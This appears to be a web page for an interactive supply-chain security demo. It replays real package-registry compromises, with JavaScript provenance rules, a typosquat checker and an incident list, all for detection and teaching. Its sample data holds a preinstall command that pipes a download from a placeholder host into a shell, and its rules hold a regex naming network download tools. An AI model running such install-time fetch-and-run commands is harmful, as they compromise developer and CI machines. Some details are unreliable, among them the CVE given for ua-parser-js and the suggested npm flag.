Supply Chain
Real package-registry compromises, replayed against a live provenance analyzer. Every scenario reproduces a public incident — event-stream, ua-parser-js, node-ipc, 3CX, XZ, Ultralytics, LottieFiles, tj-actions — using the metadata signals that distinguished the poisoned version from the clean one.
package.json and registry response into the editors below. Edit either field and the analyzer re-runs live: add an install script with a curl, change the publisher IP between versions, drop the attestations array, mark a maintainer's 2FA off. Watch the seven rules (PROV01–PROV07) light up in real time. Use the typosquat checker at the bottom to test any package name against a list of 40+ popular names.
Real incident replicas
Click a card to load that incident's metadata into the editors. The fields are editable from there — try fixing the malicious one or breaking a clean one.
What you're looking at. Account-takeover: maintainer's npm token leaked. Patch published from a new IP, with a postinstall hook that downloads a binary.
Expected: PROV01 (network in install hook) + PROV03 (new publisher IP) + PROV04 (no provenance) all fire.
real-world details — ua-parser-js (2021-10, CVE-2021-44906)
Vector. Maintainer's npm account compromised via leaked credential. Attacker published 0.7.29, 0.8.0, 1.0.0 with a postinstall hook that downloaded a Linux/Windows cryptominer and a Windows credential stealer (DanaBot).
Payload. preinstall.sh / preinstall.bat → downloads jsextension binary → starts XMRig miner + Lazarus-affiliated DanaBot stealer on Windows.
Blast radius. ua-parser-js had 7M weekly downloads. Used transitively by Facebook, Microsoft, Amazon, Reddit, Slack, Discord. The affected versions were live in the registry for ~4 hours.
refs: github.com · nvd.nist.gov · www.cisa.gov
package.json + registry response (editable)
Try editing fields to see rules fire/clear: add a preinstall script with curl → PROV01. Change one version's publisherIp → PROV03. Delete an attestations array → PROV04. Set twoFactor to false on a recent maintainer → PROV06.
Provenance findings (3)
PROV01: A preinstall/install/postinstall script invokes curl/wget/powershell to download remote code at install time. This is the ua-parser-js / lottie-player playbook: the install hook downloads a payload and runs it on every developer and CI machine that installs the package.
fix: If you control the package: replace install hooks with explicit lifecycle docs. If you're a consumer: install with --ignore-scripts and pin via SHA, or use a private mirror that strips install scripts.
PROV03: The latest version was published from 45.134.20.x; the previous one from 180.252.7.x. Account-takeover incidents (ua-parser-js 2021) typically show the malicious version published from an unfamiliar geo.
fix: Cross-check with the maintainer's stated workflow. Require npm provenance / Sigstore attestation tying the build to a known CI runner.
PROV04: No verified Sigstore / npm-provenance / in-toto attestation links this artifact to a known CI builder and source commit, so you're trusting the registry alone. Ultralytics 8.3.41 (2024) shipped without provenance, and the wheel SHA differed from a clean source build.
fix: Pin to versions that publish provenance. For npm, use `npm install --foreground-scripts=false` and `npm audit signatures`. For PyPI, prefer projects publishing PEP 740 attestations.
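As an added example (not the page's own analyzer code), here is a minimal JavaScript re-implementation of rules PROV01, PROV03, PROV04 and PROV06 run over a constructed package.json and registry document; the document shape and field names (versions[] in publish order, publisherIp, attestations, maintainers[].twoFactor) are assumptions that mirror the page's editable fields rather than the real npm packument format.

```javascript
// Added example (not the page's live analyzer): rules PROV01/03/04/06 over a constructed
// package.json + registry document whose shape (versions[] in publish order, publisherIp,
// attestations, maintainers[].twoFactor) mirrors the page's editable fields, not the real npm packument.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const NETWORK_RE = /\b(curl|wget|powershell|Invoke-WebRequest|iwr|bitsadmin)\b/i;

function analyze(pkg, registry) {
  const findings = [];
  // PROV01: an install-phase lifecycle script calls a network download tool.
  for (const hook of INSTALL_HOOKS) {
    const cmd = pkg.scripts?.[hook];
    if (cmd && NETWORK_RE.test(cmd)) findings.push({ rule: "PROV01", detail: `${hook}: ${cmd}` });
  }
  const versions = registry.versions; // assumed sorted in publish order
  const latest = versions[versions.length - 1], prev = versions[versions.length - 2];
  // PROV03: the latest version was published from a different IP than the previous one.
  if (prev && prev.publisherIp !== latest.publisherIp) {
    findings.push({ rule: "PROV03", detail: `${latest.version} from ${latest.publisherIp}, ${prev.version} from ${prev.publisherIp}` });
  }
  // PROV04: no attestation ties the latest artifact to a known builder and source commit.
  if (!Array.isArray(latest.attestations) || latest.attestations.length === 0) {
    findings.push({ rule: "PROV04", detail: `${latest.version} has no attestations` });
  }
  // PROV06: a maintainer without 2FA who was added after the previous release shipped.
  for (const m of registry.maintainers) {
    if (m.twoFactor === false && (!prev || Date.parse(m.added) > Date.parse(prev.publishedAt))) {
      findings.push({ rule: "PROV06", detail: `${m.name} added ${m.added} without 2FA` });
    }
  }
  return findings;
}
const firedRules = (pkg, registry) => analyze(pkg, registry).map((f) => f.rule);

// Constructed sample modelled on the account-takeover card; IPs are RFC 5737 test
// addresses and the download URL is a placeholder.
const SAMPLE = {
  pkg: { name: "example-pkg", version: "1.2.3",
         scripts: { preinstall: "curl -s http://example.invalid/setup.sh | sh" } },
  registry: {
    versions: [
      { version: "1.2.2", publishedAt: "2024-01-10T00:00:00Z", publisherIp: "198.51.100.7",
        attestations: [{ predicateType: "https://slsa.dev/provenance/v1" }] },
      { version: "1.2.3", publishedAt: "2024-03-02T12:15:00Z", publisherIp: "203.0.113.5" },
    ],
    maintainers: [
      { name: "long-time-maintainer", twoFactor: true, added: "2015-06-01" },
      { name: "new-collaborator", twoFactor: false, added: "2024-02-20" },
    ],
  },
};
```

Running `firedRules(SAMPLE.pkg, SAMPLE.registry)` on the sample lights up all four rules; removing the preinstall hook, reusing the previous publisher IP, restoring the attestations array and turning 2FA back on clears them one by one, which is the same exercise the editors above invite.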
Typosquat checker
Paste any npm or PyPI package name. The checker computes Levenshtein distance against 40+ popular packages and flags any neighbour within edit-distance 2 — the same heuristic used by registry abuse-detection teams.
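As an added example (not the page's checker), the following JavaScript implements the same Levenshtein heuristic against a constructed, abbreviated popular-name list and labels each near-miss with the mutation patterns from the documented typosquat list further down; one caveat it makes explicit is that the TLD-style swap (discord.js → discord.dev) is three edits away, so an edit-distance-2 cutoff alone would miss it and a separate prefix comparison is needed.

```javascript
// Added example, not the page's checker: Levenshtein distance against a constructed,
// abbreviated popular-name list; neighbours within edit-distance 2 are flagged and
// labelled with the mutation pattern. The TLD-style swap is > 2 edits away, so it is
// caught by a prefix comparison instead.
const POPULAR = ["lodash", "request", "react-native", "discord.js", "pyyaml",
                 "tensorflow", "colorama", "typing-extensions", "cross-env"];
const HOMOGLYPHS = { I: "l", "1": "l", "0": "o" }; // candidate char -> look-alike target char

function levenshtein(a, b) {
  let prev = Array.from({ length: b.length + 1 }, (_, j) => j); // O(|b|) rolling row
  for (let i = 1; i <= a.length; i++) {
    const cur = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      cur[j] = Math.min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost);
    }
    prev = cur;
  }
  return prev[b.length];
}

// Name the mutation that turns `target` into `cand`, using the page's vocabulary.
function classify(cand, target, d) {
  const c = cand.toLowerCase(), t = target.toLowerCase();
  if (c !== t && c.includes(".") && t.includes(".") && c.split(".")[0] === t.split(".")[0]) return "TLD-style swap";
  if (c === t.replace(/-/g, "")) return "dash removal";
  if (c.replace(/_/g, "-") === t) return "underscore-vs-dash";
  if (c.length === t.length) {
    const diff = [...c].map((_, i) => i).filter((i) => c[i] !== t[i]);
    if (diff.length === 2 && diff[1] === diff[0] + 1 && c[diff[0]] === t[diff[1]] && c[diff[1]] === t[diff[0]]) return "transposition";
    if (diff.length === 1) return HOMOGLYPHS[cand[diff[0]]] === t[diff[0]] ? "homoglyph" : "single-letter substitution";
  }
  if (d === 1 && c.length === t.length + 1) return "single-letter insertion";
  if (d === 1 && c.length === t.length - 1) return "single-letter omission";
  return "other";
}

// Return every popular name the candidate is suspiciously close to, nearest first.
function checkName(name, popular = POPULAR) {
  const hits = [];
  for (const target of popular) {
    if (name.toLowerCase() === target) continue; // it is the real package, not a squat
    const distance = levenshtein(name.toLowerCase(), target);
    const pattern = classify(name, target, distance);
    if (distance <= 2 || pattern === "TLD-style swap") hits.push({ target, distance, pattern });
  }
  return hits.sort((a, b) => a.distance - b.distance);
}
```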
Documented typosquat patterns
Patterns the analyzer's PROV07 rule scores against. Drawn from documented real incidents where possible.
- lodash → loadash: single-letter insertion · loadash (npm) repeatedly republished by malware authors 2017–2024
- lodash → lodahs: transposition
- request → requets: transposition
- react-native → react-natve: single-letter omission
- discord.js → discord.dev: TLD-style swap on package name · multiple 2023 npm campaigns
- pyyaml → pyyamI: homoglyph (capital I instead of lowercase l)
- tensorflow → tensorlfow: transposition
- colorama → colourama: British-English spelling · PyPI 2017 — PoC by Bertus, later used by attackers
- typing-extensions → typing_extensions: underscore-vs-dash on PyPI (different packages)
- cross-env → crossenv: dash removal · crossenv (npm 2017) — exfiltrated env vars to npm.hacktask.net
Incident reading list
- event-stream → flatmap-stream → bitcoin wallet exfil (Copay) (2018-11) · advisory
- ua-parser-js account takeover → cryptominer + password stealer (2021-10, CVE-2021-44906) · advisory
- node-ipc protestware wipes files on RU/BY hosts (peacenotwar) (2022-03, CVE-2022-23812) · advisory
- 3CX double supply-chain (X_TRADER → 3CX → 600k customers) (2023-03) · advisory
- XZ Utils backdoor (Jia Tan, multi-year social-engineering) (2024-03, CVE-2024-3094) · advisory
- Ultralytics PyPI build-cache poisoning → XMRig (2024-12) · advisory
- LottieFiles npm token leak → web3 wallet drainer (2024-10) · advisory
- tj-actions/changed-files retroactive tag-rewrite (CI secret theft) (2025-03, CVE-2025-30066) · advisory